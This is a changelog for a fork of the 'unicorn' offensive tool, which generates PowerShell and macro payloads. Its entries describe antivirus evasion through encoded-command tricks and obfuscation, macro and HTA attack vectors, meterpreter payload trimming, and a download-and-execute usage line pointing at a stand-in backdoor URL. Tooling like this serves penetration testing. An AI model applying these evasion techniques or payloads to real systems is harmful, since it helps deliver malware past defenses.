forked from trustedsec/unicorn
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CHANGELOG.txt
141 lines (102 loc) · 4.37 KB
/
CHANGELOG.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
~~~~~~~~~~~~~~~~
version 2.3.5
~~~~~~~~~~~~~~~~
* added better evasion on encodedcommand
~~~~~~~~~~~~~~~~
version 2.3.4
~~~~~~~~~~~~~~~~
* added decoded base64 -encodedcommand for better av evasion
~~~~~~~~~~~~~~~~
version 2.3.3
~~~~~~~~~~~~~~~~
* most AVs were flagging on -enc instead of -EncodedCommand along with base64 would flag windows defender.. looks like this gets around it on both macro and standard ps1/encoded command params.
~~~~~~~~~~~~~~~~
version 2.3.2
~~~~~~~~~~~~~~~~
* change auto_open to autopen() - thanks @JAshton
~~~~~~~~~~~~~~~~
version 2.3.1
~~~~~~~~~~~~~~~~
* fix indent issue
~~~~~~~~~~~~~~~~
version 2.3
~~~~~~~~~~~~~~~~
* added support for windows/download_exec as a payload option - just run python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe - note it doesn't need to be an exe, whatever you want to download and execute
* fixes an issue that caused macro injection to not properly work (duplicate powershell command)
~~~~~~~~~~~~~~~~
version 2.2
~~~~~~~~~~~~~~~~
* pep8 formatting
* python3 conversion
* added randomized variables (not fully completed yet but its better than before) - AV picking up on variables and base64 encoded strings
~~~~~~~~~~~~~~~~
version 2.1.2
~~~~~~~~~~~~~~~~
* added enablestageencoding to true by default
~~~~~~~~~~~~~~~~
version 2.1.1
~~~~~~~~~~~~~~~~
* added --smallest flag to msfvenom generate which compacts shellcode to smaller size
~~~~~~~~~~~~~~~~
version 2.1
~~~~~~~~~~~~~~~~
* added ability to import your own powershell into attacks (thanks to curi0usJack pull request)
* fixed an issue when generating macro attack with appropriate spacing on macros
~~~~~~~~~~~~~~~~
version 2.0
~~~~~~~~~~~~~~~~
* added brand new hta attack vector for direct web application compromise (thanks Justin Elze)
* added brand new attack binary to cert (thanks Matthew Graeber)
* added window.close(); after script
~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~
* slimmed down powershell injection code even more
* when using windows/meterpreter/reverse_https, the option flags StagerURILength=5 StagerVerifySSLCert=false are specified in order to trim down payload. This is due to char restriction sizes when pasting into a command window. With these two settings, the codebase is slimmed down significantly and fits within the normal length
* added support for shikata ga nai to obfuscate shellcode prior to utf and b64encoding. Will now through off sigs if contained inside of a file.
~~~~~~~~~~~~~~~~
version 1.2
~~~~~~~~~~~~~~~~
* fixed an issue where powershell injection may not work on 32 bit platforms
* shaved command line argument down around 32 bytes
~~~~~~~~~~~~~~~~
version 1.1
~~~~~~~~~~~~~~~~
* fixed autoopen from not working on some office implementations - now works on all office documents including powerpoint/word/excel
* changed the open description to fix a typo and also make it more believable
* fixed spacing issues when generating macro attack
* added instructions on when using macro on how to add the macro to an office document
* added better description and instructions for powershell injection
* added better description on initial loading of payload
~~~~~~~~~~~~~~~~
version 1.0
~~~~~~~~~~~~~~~~
* incorporated new macro attack from Rik van Duijn RCX @rikduijn
* code cleanup and fixed an issue that would not present argument values when not formatted properly
* channeled stderr to subprocess.PIPE
* slimmed unicorn powershell injection code about 17 bytes to compact powershell injection
~~~~~~~~~~~~~~~~
version 0.5
~~~~~~~~~~~~~~~~
* fixed hidden window command when using powershell injection
~~~~~~~~~~~~~~~~
version 0.4
~~~~~~~~~~~~~~~~
* shortened powershell injection code by removing un-used code and shortening initial command names
* removed EnableStageEncoding - after testing extensively, this can produce unreliable results.
* fixed a bug that caused unicorn to not work properly due to changes with MSFVenom
* slimmed encoded powershell command, removed un-used else statement
~~~~~~~~~~~~~~~~
version 0.3
~~~~~~~~~~~~~~~~
* updated msfvenom to include format type and architecture to remove bug it would not generate appropriate shellcode
~~~~~~~~~~~~~~~~
version 0.2
~~~~~~~~~~~~~~~~
* changed output name
* added appropriate licensing
* slimmed the powershell code and added noprofile to downgrade process
~~~~~~~~~~~~~~~~
version 0.1
~~~~~~~~~~~~~~~~
* initial release of magic unicorn